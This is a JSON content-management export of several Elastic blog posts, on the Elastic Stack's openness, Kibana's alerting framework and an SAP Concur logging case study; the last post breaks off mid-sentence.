href=\"/observability\"\u003e\u003cstrong\u003eElastic Observability\u003c/strong\u003e\u003c/a\u003e brings together our free and open log monitoring, metrics, APM, and uptime monitoring products into a single powerful solution.\u003c/li\u003e\u003cli\u003e\u003ca href=\"/security\"\u003e\u003cstrong\u003eElastic Security\u003c/strong\u003e\u003c/a\u003e combines a free SIEM with an open community, open roadmap, and open data model.\u0026nbsp;\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eThese are just a handful of examples. There is so much more to explore.\u0026nbsp;\u003c/p\u003e\u003ch3\u003eGet started now\u003c/h3\u003e\u003cp\u003eEveryone has access to a fast and frictionless getting started experience with the Elastic Stack. You can get started with the Elastic Stack in a few different ways.\u003c/p\u003e\u003cul\u003e\u003cli\u003eIt takes only 3 minutes to \u003ca href=\"https://www.elastic.co/cloud/elasticsearch-service/signup\"\u003espin up a free trial in Elastic Cloud\u003c/a\u003e — meaning in less time than it takes to make a cup of coffee you can have your very own Elastic Stack ready to go.\u003c/li\u003e\u003cli\u003eLike to test things out locally? No problem! You can always \u003ca href=\"https://www.elastic.co/start\"\u003edownload the latest versions and run them yourself\u003c/a\u003e.\u003c/li\u003e\u003cli\u003eWant to see the Elastic Stack in action and learn how companies around the world use Elastic products and solutions to tackle challenging business and technology problems? Check out our \u003ca href=\"https://www.elastic.co/videos/\"\u003elibrary of instructional how-to webinars as well as recorded customer case studies\u003c/a\u003e.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eWe believe that the best products are built in the open, in collaboration with a passionate group of developers and users who push the bounds of what’s possible. That means we need you! \u003ca href=\"http://discuss.elastic.co\"\u003eHop into our forums\u003c/a\u003e and engage directly with our engineers or check out what’s happening in our \u003ca href=\"https://github.com/elastic/elasticsearch\"\u003epublic\u003c/a\u003e \u003ca href=\"https://github.com/elastic/kibana\"\u003eGitHub\u003c/a\u003e \u003ca href=\"https://github.com/elastic/beats\"\u003erepositories\u003c/a\u003e. To us, contributing isn’t only about writing code — it’s about bringing new ideas, showing others what’s possible, and creating a community where everyone can learn and grow.\u003c/p\u003e","callout":[],"category":[{"_version":5,"locale":"en-us","uid":"blt0c9f31df4f2a7a2b","ACL":{},"created_at":"2018-08-27T12:32:48.561Z","created_by":"sys_blt57a423112de8a853","key":"company-news","label_l10n":"News","tags":[],"title":"News","updated_at":"2024-05-10T13:44:22.885Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-29T20:00:07.956Z","user":"blt27204bf9f7abb7fd"}}],"created_at":"2020-03-25T18:50:01.675Z","created_by":"blt5e2e57ad0db85eaf","disclaimer":["bltf9af9dd1c8f2cc76"],"full_bleed_image":{"title":"elastic-stack-blog-banner.png","uid":"bltc6ca841d56fac957","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T06:00:13.894Z","updated_at":"2019-01-05T06:00:13.894Z","content_type":"image/png","file_size":"33477","filename":"elastic-stack-blog-banner.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-06-25T16:51:01.740Z","user":"blt5c97f327f30903e707c39c30"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc6ca841d56fac957/5c3047ed33d6423967f5b528/elastic-stack-blog-banner.png"},"markdown_l10n":"","publish_date":"2020-04-06T17:00:00.000Z","seo":{"seo_title_l10n":"The Elastic (ELK) Stack: Free. Open. Limitless.","seo_description_l10n":"Being free and open is in our DNA. In the early days, Elasticsearch, Logstash, and Kibana became the ELK Stack (now Elastic Stack) and sowed the seeds of a new use case (logging). And now we have a dedicated Observability solution. Then security practitioners took notice and started using ELK Stack to power their security analytics, and now we have a free and open SIEM. This has continued all these years with community-created and -inspired features, extensions, plugins, and use cases.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"title":"elastic-stack-blog-thumb.png","uid":"blt86b878c1e4511d2f","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T06:00:15.954Z","updated_at":"2019-01-05T06:00:15.954Z","content_type":"image/png","file_size":"26782","filename":"elastic-stack-blog-thumb.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-06-25T16:51:01.740Z","user":"blt5c97f327f30903e707c39c30"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt86b878c1e4511d2f/5c3047efc0508d076e1712bb/elastic-stack-blog-thumb.png"},"title":"The Elastic Stack: Free. Open. Limitless. Open source. Again.","title_l10n":"The Elastic Stack: Free. Open. Limitless. \u003cem\u003eOpen source. Again.\u003c/em\u003e","updated_at":"2024-10-15T15:21:16.773Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/elasticsearch-free-open-limitless","publish_details":{"time":"2024-11-08T20:54:47.135Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd1e7e60b9281d98e","_version":11,"locale":"en-us","ACL":{},"abstract_l10n":"Alerting spans all our products and use cases. Find out more about current alerting capabilities in the Elastic Stack and exciting stuff in the works.","author":["bltf4a4f81e4b0d1965"],"body_l10n":"\u003cp\u003eAlerting is fundamental to Elastic's use cases. Since \u003ca href=\"/guide/en/kibana/7.3/watcher-ui.html\"\u003eWatcher\u003c/a\u003e (our original suite of alerting features for Elasticsearch) was \u003ca href=\"/blog/watcher-you-know-for-alerting-coming-soon\"\u003eintroduced back in 2015\u003c/a\u003e, we’ve received a lot of feedback that’s helped refine our understanding of what an alerting system needs to be and what the user experience should entail. The purpose of this post is to summarize some of the key things we’ve learned, how it’s influenced our work in 2019, and what the future holds for alerting for the Elastic Stack.\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch2\u003eWhat have we learned?\u003c/h2\u003e\u003c/strong\u003e\n\u003cp\u003eFour years of alerting at Elastic has created a wealth of knowledge about alerting systems. I’ve tried to synthesize what we’ve learned into three forward-looking observations: we see alerts in every use case; we need to make sense of them across use cases; and alert detection and response are growing more sophisticated. These learnings shape our thinking about the future of alerting.\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch3\u003eAlerting everywhere\u003c/h3\u003e\u003c/strong\u003e\n\u003cp\u003eAlerting cuts across all our products and use cases. If you have live data, there’s a case for alerting. This is why we built Watcher and why it’s been successful. Yet when we look across use cases it’s clear there’s no one-size-fits-all alerting.\n\u003c/p\u003e\n\u003cp\u003eFrom products like Elastic Logs, SIEM, APM, Uptime, Infrastructure, and Maps, to features like monitoring and machine learning to a multitude of Kibana dashboards, alerts and notifications play a critical role, yet each has unique needs for detecting conditions, expressing them, and showing them in context. Effective alerting and monitoring requires deep integration with a product. As the stack and its uses have evolved, it’s become clear that Elasticsearch alerting needs a complement that allows for tightly integrated, \u003cstrong\u003erich expression of alerts within each use case\u003c/strong\u003e.\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch3\u003eMaking sense of alerts\u003c/h3\u003e\u003c/strong\u003e\n\u003cp\u003eThe corollary of “alerting everywhere” is that as these different uses cases generate alerts, alerts becomes their own source of data and create opportunities for understanding systems and their state. Or, as the Site Reliability Engineering (SRE) community might say, there are opportunities to improve the observability of an overall system.\n\u003c/p\u003e\n\u003cp\u003eEach use case interprets data its own way, and alerts show different facets of a situation. The right response to an incident often hinges on data from multiple sources, and correlating different types of alerts and events to understand a situation. In some domains, like SIEM, higher level alerts are triggered from patterns in lower level alerts.\n\u003c/p\u003e\n\u003cp\u003eAs the Elastic Stack increasingly becomes home to more and more use cases, an alerting system done right will not just generate alerts but also help you \u003cstrong\u003emake sense of them across use cases\u003c/strong\u003e. For instance, Uptime alerts may show a service outage, APM alerts explain which transaction caused it, while monitoring alerts pinpoint why it happened. An alerting system should provide context, enable correlation, and improve awareness — for both people and machines.\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch3\u003eDetection and action\u003c/h3\u003e\u003c/strong\u003e\n\u003cp\u003eThe corollary of “making sense of alerts” is that with a more observable system, you can detect more complex conditions and take more sophisticated actions. Increasingly this goes beyond what we traditionally think of as alerting.\n\u003c/p\u003e\n\u003cp\u003eAlerting is usually focused on detecting a condition and then getting a human’s attention — and often it ends there. Looking at the bigger picture though, an alerting system can be thought of as part of a control or feedback loop: observe, detect a condition, take some action, observe again.\n\u003c/p\u003e\n\u003cp\u003eToday an ‘action’ usually involves notification — putting a human in the loop to control the system and try to correct it. But as system insight improves, the ‘action’ can take on more control, usually under human supervision. This could be a semi-autonomous system governed by a two way conversation (chatbots for example), or a fully autonomous system, as we see in the trend towards auto-scaling, self-healing, and self-optimizing applications.\n\u003c/p\u003e\n\u003cp\u003eAn alerting system needs to support \u003cstrong\u003esophisticated detection and actions\u003c/strong\u003e, acknowledging that ‘detection’ can be more than a query to Elasticsearch, and ‘action’ is becoming more than sending an email or calling a webhook.\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch2\u003eApplying what we’ve learned\u003c/h2\u003e\u003c/strong\u003e\n\u003cp\u003eWe decided back in the \u003ca href=\"https://github.com/elastic/kibana/issues/24214\"\u003efall of 2018\u003c/a\u003e that we needed alerting to support the three observations above.\n\u003c/p\u003e\n\u003cp\u003eWe also decided that having alerts as first-class entities in Kibana would be the best way to do this:\n\u003c/p\u003e\n\u003cul\u003e\n\t\u003cli\u003e\u003cstrong\u003eAlerting everywhere\u003c/strong\u003e: rich alerting integrations across our products, at the plugin, API, and UI levels\u003c/li\u003e\n\t\u003cli\u003e\u003cstrong\u003eMaking sense of alerts\u003c/strong\u003e: providing an intuitive interface across alerting types\u003c/li\u003e\n\t\u003cli\u003e\u003cstrong\u003eDetection and action\u003c/strong\u003e: sophisticated detection and action mechanisms via Kibana plugins\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eWe also know from Watcher that alerting must scale to production alert loads and be highly available and reliable. APIs, UIs, and plugin/library contracts to support the three observations must be built on a solid and scalable base. All together we see four layers to Elastic’s alerting system:\n\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt48e66e76c9686633/5d8247931ec6f77b9b7f21db/alerting-layers-blog.png\" data-sys-asset-uid=\"blt48e66e76c9686633\" alt=\"Layers of the Elastic Stack alerting system\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cfigcaption\u003eAn overview of Elastic’s alerting system\n\u003c/figcaption\u003e\n\u003cp\u003eIn 2019 we’ve been laying the foundation of the new alerting system in Kibana.\n\u003c/p\u003e\n\u003cp\u003eIn January, we added \u003ca href=\"https://github.com/elastic/kibana/issues/23632\"\u003eTask Manager\u003c/a\u003e as part of the 6.7 release. This gave Kibana background scheduling with persistent tasks that can be distributed across several Kibana instances for scalability and availability. Alert base layer components like Task Manager can power more than just alerting. For example, Task Manager could provide a better scheduled report experience in Kibana.\n\u003c/p\u003e\n\u003cp\u003eThen in June, we added \u003ca href=\"https://github.com/elastic/kibana/pull/37042\"\u003etwo new sets of APIs to Kibana\u003c/a\u003e: the alerts API and the actions API.\n\u003c/p\u003e\n\u003cp\u003eThe actions API lets Kibana register and fire actions, and provides a simple contract for defining your own, making it easy to customize. The initial release also had a few example actions for logging, Slack, and email notifications.\n\u003c/p\u003e\n\u003cp\u003eThe alerting API allows Kibana to register forms of detection as ‘alert types’, and then run these checks on a schedule using the Task Management system. Like actions, there’s a simple alerting contract: if you can express it in a JavaScript function that runs on the Kibana server, it can power an alert.\n\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0172899948524258/5d8247b1631ee43e546a1c3a/alerting-geo-alert-blog.gif\" data-sys-asset-uid=\"blt0172899948524258\" alt=\"Geo boundary alert plugin\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cfigcaption\u003eA proof-of-concept geo-boundary alert plugin written in v7.3. This tracks 1600 transit vehicles in a single alert, writing the entries into and exits from the red polygon into a log file. The entry and exit of the purple vehicle (#8341) is highlighted.\n\u003c/figcaption\u003e\n\u003cp\u003eElastic Stack 7.4 is focused on filling out the lower levels of the alerting system: we’re hardening the APIs; adding support for \u003ca href=\"https://github.com/elastic/kibana/pull/41389\"\u003esecurity\u003c/a\u003e and \u003ca href=\"https://github.com/elastic/kibana/pull/42081\"\u003espaces\u003c/a\u003e; and adding a few more built-in actions like \u003ca href=\"https://github.com/elastic/kibana/pull/41592\"\u003eindexing\u003c/a\u003e, \u003ca href=\"https://github.com/elastic/kibana/pull/43538\"\u003ewebhooks\u003c/a\u003e and \u003ca href=\"https://github.com/elastic/kibana/pull/43395\"\u003epager duty\u003c/a\u003e.\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch2\u003eWhat’s next?\u003c/h2\u003e\u003c/strong\u003e\n\u003cp\u003eDevelopment of Kibana’s alerting system has been in full swing for the last couple of months, and that’s going to continue through the 7.x release cycle. Our plan is to roll out the system in three phases.\n\u003c/p\u003e\n\u003cp\u003eThe first phase has been going on for much of 2019: laying the foundation. It focuses on scalable task management and scheduling, contracts for alerting and action, and APIs.\n\u003c/p\u003e\n\u003cp\u003eWe’re now moving into the second phase, where \u003cem\u003edifferent use cases can integrate\u003c/em\u003e the alerting system at the API and library levels. This also includes designing and building a UI in Kibana as part of making sense of alerts and validating it with specific use cases (like \u003ca href=\"/infrastructure-monitoring\"\u003emonitoring\u003c/a\u003e, \u003ca href=\"/uptime-monitoring\"\u003euptime\u003c/a\u003e, or \u003ca href=\"/siem\"\u003eSIEM\u003c/a\u003e for example).\n\u003c/p\u003e\n\u003cp\u003eThe third phase will extend the \"alerts everywhere\" and \"detection and action\" themes by allowing \u003cem\u003euser defined alerts\u003c/em\u003e throughout Kibana, whether through templated alerts or even expression based alerts using something like \u003ca href=\"/guide/en/kibana/7.3/canvas-function-reference.html\"\u003eCanvas expressions\u003c/a\u003e.\n\u003c/p\u003e\n\u003cp\u003eThe end goal is a system that satisfies our vision of alerting in the Elastic Stack:\n\u003c/p\u003e\n\u003cul\u003e\n\t\u003cli\u003e\u003cstrong\u003eAlerting everywhere\u003c/strong\u003e: Alerts are a first class, space-aware entity within Kibana. This makes it possible to segment the creation and viewing of alerts across groups, and allows rich integration of alerting in products like SIEM, Monitoring, and Uptime (to name a few). Alerting complements and works alongside Watcher, it does not replace it.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\t\u003cli\u003e\u003cstrong\u003eMaking sense of alerts\u003c/strong\u003e: Rich alerting integrations will be accompanied by Kibana UI that provides comprehensive views across alert types, as well as tools for correlating and making sense of alert history.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\t\u003cli\u003e\u003cstrong\u003eDetection and action\u003c/strong\u003e: The APIs and plugins are designed so that a detection or action mechanism can be anything provided it can be expressed in JavaScript running on the Kibana server. This leaves plenty of room for the sophisticated detections and actions that will appear in Kibana through products like SIEM or our observability solutions.\u003c/li\u003e\n\u003c/ul\u003eThe full alerting system won’t be realized overnight, but with the foundation in place you’re going to see aspects of this new alerting vision appear in upcoming releases of Kibana. We’re looking forward to building the system out, getting your feedback, and pushing the limits — and you can follow our progress in \u003ca href=\"https://github.com/elastic/kibana/projects/26\"\u003eGitHub\u003c/a\u003e!","callout":[{"uid":"blt45b28b3fd05e72ad","_content_type_uid":"callout"}],"category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-09-18T15:34:04.789Z","created_by":"bltea6cbb86fea188be","disclaimer":["bltf25c0738ab44ccd2"],"full_bleed_image":{"uid":"blt71790a78cb424fba","created_by":"bltea6cbb86fea188be","updated_by":"bltea6cbb86fea188be","created_at":"2019-09-18T15:23:16.881Z","updated_at":"2019-09-18T15:23:16.881Z","content_type":"image/jpeg","file_size":"98039","filename":"alerting-blog-banner.jpg","title":"alerting-blog-banner.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-09-18T18:58:47.104Z","user":"bltea6cbb86fea188be"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt71790a78cb424fba/5d824be4631ee43e546a1c76/alerting-blog-banner.jpg"},"markdown_l10n":"","publish_date":"2019-09-18T19:00:00.000Z","seo":{"seo_title_l10n":"Alerting in the Elastic Stack","seo_description_l10n":"Watcher (our original suite of alerting features for Elasticsearch) was introduced back in 2015. Find out more about the Elastic Stack’s current alerting capabilities and the future vision: alerting everywhere, how to make sense of those alerts, and detection and action.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt5d7d3a60d10a5bd4","created_by":"bltea6cbb86fea188be","updated_by":"bltea6cbb86fea188be","created_at":"2019-09-18T15:23:11.826Z","updated_at":"2019-09-18T15:23:11.826Z","content_type":"image/jpeg","file_size":"174205","filename":"alerting-blog-thumb.jpg","title":"alerting-blog-thumb.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-09-18T18:58:47.104Z","user":"bltea6cbb86fea188be"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5d7d3a60d10a5bd4/5d824bdff468a17c139320f5/alerting-blog-thumb.jpg"},"title":"Alerting in the Elastic Stack","title_l10n":"Alerting in the Elastic Stack","updated_at":"2024-10-09T18:02:45.241Z","updated_by":"blt36e890d06c5ec32c","url":"/blog/alerting-in-the-elastic-stack","publish_details":{"time":"2024-10-09T18:03:04.796Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt9f2a69fe0f3c1538","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Learn how SAP Concur has grown their logging solution from an IT necessity to a DevOps strategy, enabling easy end-to-end service ownership.","author":["blte575a361bf13bf20"],"body_l10n":"\u003cp\u003e\u003cem\u003eThis post is a recap of a community\u0026nbsp;talk given at \u003ca href=\"/elasticon/conf/2018/sf\"\u003eElastic{ON} 2018\u003c/a\u003e. Interested in seeing more talks like this? Check out the conference archive or find out when the \u003ca href=\"/elasticon\"\u003eElastic{ON} Tour\u003c/a\u003e is coming to a city near you.\u003c/em\u003e\n\u003c/p\u003e\n\u003cp\u003eIf you've ever entered an expense report, there's a good chance you'd done it through SAP Concur. With over 45 million users spanning more than 150 countries (including 70% of the Fortune 500), Concur is a top travel and expense solution. In 2016 alone, the SaaS offering processed over $87 billion USD in expenses, meaning over 2.4 million receipts and $187 million USD in invoicing every day. That may seem like a lot of line items for accounting, but it creates even more log lines for a logging solution to handle on a daily basis.\n\u003c/p\u003e\n\u003cp\u003eConcur has been around for over 20 years, and as their product offerings have grown and evolved, so has their logging solution. Not just in the technology that they use, but also in the scope and intent of its usage. Initially a SQL-based solution used for simple log storage, their current logging solution — built on the Elastic Stack — helps promote end-to-end application ownership, and aligns development, testing, and operations. And in the future, Concur's LAMA (Logging, Alerting, Monitoring, and Analytics) team plans to use Elastic machine learning for operational analytics and insight as well as for automating rollouts and rollbacks. They've taken great leaps in logging, but they didn't get from log storage to analytics overnight.\n\u003c/p\u003e\n\u003cp\u003eOriginally built on a relational database, their logging solution ingested log data as XML via RabbitMQ, and their users loved that they could easily query for logs using SQL. But as the popularity of the service grew, so did usage. As peak ingest grew to 200 GB/day — with rates in upwards of 1,500 docs/sec — the service reached its limits, and performance-based service lags could force users to wait up to 20 minutes for a log to be available in the system. In response, all the logging team was able to do was put their database on more powerful hardware, which was an unsustainable process. What they needed was horizontal scalability, so they set out to find a better solution.\n\u003c/p\u003e\n\u003cp\u003eAfter researching Elasticsearch and hearing about different \u003ca href=\"/customers/success-stories\"\u003esuccess stories\u003c/a\u003e from companies in similar situations, Concur chose the Elastic Stack as their logging solution. It was fast, it was powerful, and it was scalable — and (possibly more) importantly to their internal users, it had a visualization component that their users loved. Previously, different teams would build their own interfaces and dashboards, often incurring licensing fees for the tools they had to use to get the job done. With Kibana, Concur had a unified visualization solution, removing the need for homegrown\u0026nbsp;or 3rd party visualization solutions.\n\u003c/p\u003e\n\u003cp\u003eThe first implementation of Elastic was with Elasticsearch 1.1 and Kibana 3, with ingest coming from Logstash, RabbitMQ (same as they'd used with the SQL solution), and Fluentd. The logging team was also able to build their own alerting plugin (a benefit of the open source nature of Elastic), as one did not yet exist within the Elastic Stack. Between the increased speed of Elasticsearch, the visualizations of Kibana, and the alerting features of their homegrown Watcher plugin, service adoption increased across Concur and ingest skyrocketed to 5,000 doc/sec. That's something their SQL solution couldn't have come close to handling.\n\u003c/p\u003e\n\u003ch2\u003eGrowing from Solution to Strategy with Elastic\u003c/h2\u003e\n\u003cp\u003eSince that initial implementation, Concur's logging solution has grown with the Elastic Stack. In 2015, they upgraded to Elasticsearch 2.3 and Kibana 4.5, purchased a \u003ca href=\"/subscriptions\"\u003eGold subscription\u003c/a\u003e, and began using \u003ca href=\"/beats\"\u003eBeats\u003c/a\u003e (as a replacement for Fluentd), \u003ca href=\"/what-is/kibana-alerting\"\u003eWatcher\u003c/a\u003e (to replace their homegrown solution) and \u003ca href=\"/what-is/elastic-stack-security\"\u003eShield\u003c/a\u003e (for security). They also built another custom plugin, this time a custom aggregation UI. As their logging solution improved, so did adoption, and by 2017, their ingest rate was up to 60,000 doc/sec (4TB/day).\n\u003c/p\u003e\n\u003cp\u003eAfter attending \u003ca href=\"/elasticon/conf/2017/sf\"\u003eElastic{ON} 2017\u003c/a\u003e, Concur upgraded again, this time to take advantage of cross cluster search, improved security (needed to ensure GDPR compliance), and other new \u003ca href=\"/elastic-stack\"\u003eElastic Stack features\u003c/a\u003e they'd learned about during the conference. Using cross cluster search, they were able to break up their monolithic cluster into multiple, smaller clusters spread across multiple regions. This version upgrade — as well as their move to a Platinum subscription — has helped them to establish the environment they use today, with a variety of ingest sources, Elasticsearch clusters across multiple regions (5TB/day in the US), and Kibana dashboards used by operations, SREs, support, executive leadership, and more. And all that is managed by a LAMA Team made up of six engineers and two managers.\n\u003c/p\u003e\n\u003cp\u003eLearn about how Concur went from log storage to ownership enablement by watching \u003ca href=\"/elasticon/conf/2018/sf/elastic-at-sap-concur-driving-the-journey-to-devops-and-end-to-end-ownership\"\u003eElastic @ SAP Concur: Driving the Journey to DevOps and End-to-End Ownership\u003c/a\u003e from \u003ca href=\"/elasticon/conf/2018/sf\"\u003eElastic{ON} 2018\u003c/a\u003e. You'll also learn how they enabled one-click logging service deployment, how they configured mappings (non-dynamic) and fields for over 200 teams, and what their plans are for leveraging the power of Elastic machine learning.\n\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"/elasticon/conf/2018/sf/elastic-at-sap-concur-driving-the-journey-to-devops-and-end-to-end-ownership\"\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc1360b51d3d161a4/5c57dc114c9f4feb0b4c585a/concur_elasticon_thumb.png\" data-sys-asset-uid=\"bltc1360b51d3d161a4\" alt=\"\" style=\"display: block; margin: auto;\"\u003e\u003c/a\u003e\n\u003c/p\u003e","callout":[{"uid":"blt45b28b3fd05e72ad","_content_type_uid":"callout"}],"category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2019-04-01T13:28:25.564Z","created_by":"sys_blt57a423112de8a853","disclaimer":["bltf25c0738ab44ccd2"],"full_bleed_image":{"title":"concur_elasticon_banner.jpg","uid":"blt4dad19c6b45e3c4f","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-02-04T06:30:30.073Z","updated_at":"2019-02-04T06:30:30.073Z","content_type":"image/jpeg","file_size":"197546","filename":"concur_elasticon_banner.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-22T17:43:03.143Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4dad19c6b45e3c4f/5c57dc06c0eac4f70b57ad23/concur_elasticon_banner.jpg"},"markdown_l10n":"","publish_date":"2018-10-24T16:00:00.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"Learn how SAP Concur has leveraged the Elastic Stack to grow their logging service solution from an IT necessity to a DevOps strategy, enabling easy end-to-end service ownership and creating simple, one-click deployment plans.","canonical_tag":""},"tags":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"title":"concur_elasticon_thumb2.png","uid":"bltc0da451bb44b9fc9","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-02-04T06:30:35.539Z","updated_at":"2019-02-04T06:30:35.539Z","content_type":"image/png","file_size":"124945","filename":"concur_elasticon_thumb2.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-22T17:43:03.143Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc0da451bb44b9fc9/5c57dc0b52256ff20b4afae9/concur_elasticon_thumb2.png"},"title":"SAP Concur: Elastic Logging as a DevOps Strategy","title_l10n":"SAP Concur: Elastic Logging as a DevOps Strategy","updated_at":"2024-10-09T18:02:44.787Z","updated_by":"blt36e890d06c5ec32c","url":"/blog/sap-concur-elastic-logging-as-a-devops-strategy","publish_details":{"time":"2024-10-09T18:03:04.820Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blte035581e625b7e09","_version":14,"locale":"en-us","ACL":{},"abstract_l10n":"We’re excited to announce a new alerting framework that delivers a first-class alerting experience natively within the SIEM, Uptime, APM, and Metrics applications as part of the Kibana 7.7 release.","author":["bltccf9c2c3a662296d"],"body_l10n":"\u003cp\u003eWe’re excited to announce a new alerting framework that delivers a first-class alerting experience natively within the SIEM, Uptime, APM, and Metrics applications as part of the Kibana 7.7 release.\n\u003c/p\u003e\u003cp\u003eAlerting is a fundamental use case across the Elastic Stack, which is why we’re making it part of the core experience within Kibana. Whether you are monitoring application transactions or tracking brute force login attempts, our goal is to provide a tailored experience that allows you to build powerful alerts in the normal flow of your task. The new alerting framework is built from the ground up and designed to offer more than just convenient interfaces. We understand the need to go beyond just notifying people which is why we’ve also incorporated the ability to trigger predefined actions that can do anything from sending an email to using brand new third-party integrations with platforms like Slack and PagerDuty.\n\u003c/p\u003e\u003cp\u003eThe new alerting framework is being introduced as a beta in the 7.7 release of Kibana and is available immediately on the \u003ca href=\"https://www.elastic.co/cloud/elasticsearch-service\"\u003eElasticsearch Service\u003c/a\u003e on Elastic Cloud, or for \u003ca href=\"https://www.elastic.co/downloads\"\u003edownload\u003c/a\u003e.\n\u003c/p\u003e\u003cdiv class=\"embed-responsive embed-responsive-16by9 shadow m-t-40 m-b-40\"\u003e\u003cvideo autoplay=\"autoplay\" playsinline=\"playsinline\" muted=\"muted\" loop=\"loop\"\u003e\u003csource src=\"https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8b2976cc9e2baf68/5e9c00c550e659126c8d7371/video-alerting-metrics-apm-siem.mp4\" type=\"video/mp4\"\u003e\u003c/video\u003e\n\u003c/div\u003e\u003cp\u003e\u003cbr\u003e\n\u003c/p\u003e\u003cstrong\u003e\u003ch2\u003eAlerting everywhere you need it to be\u003c/h2\u003e\u003c/strong\u003e\u003cp\u003eDetecting and understanding significant signal shifts is a fundamental need that cuts across all use cases for organizations that build, maintain, and evolve digital systems. In application performance monitoring (APM), for example, you want to detect increases in latency in your application’s responsiveness as well as in error rates, because both potentially have a direct impact on your service and user experience. Furthermore, you want to be able to see this at an infrastructure level with metric alerts such as CPU or memory usage spikes or even service and network downtime. Each of these could result in application performance degradation if not acted on in a timely manner. In addition to one-time events, there is also a need to detect recurring patterns within logs in an effort to understand and proactively avoid future situations. Pivoting to a system security use case, the need for real-time alerting is vital to spot threats like distributed service requests or large data transfers at suspicious times. More broadly, in business analytics, early detection alerts of dips or spikes that correlate with core KPIs driving company performance may well contribute to the success of your strategy and execution.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eIt was with these use cases and many more in mind that in September 2019 we shared \u003ca href=\"https://www.elastic.co/blog/alerting-in-the-elastic-stack\"\u003eour vision for a new alerting framework\u003c/a\u003e in the Elastic Stack. A key part of that vision included three 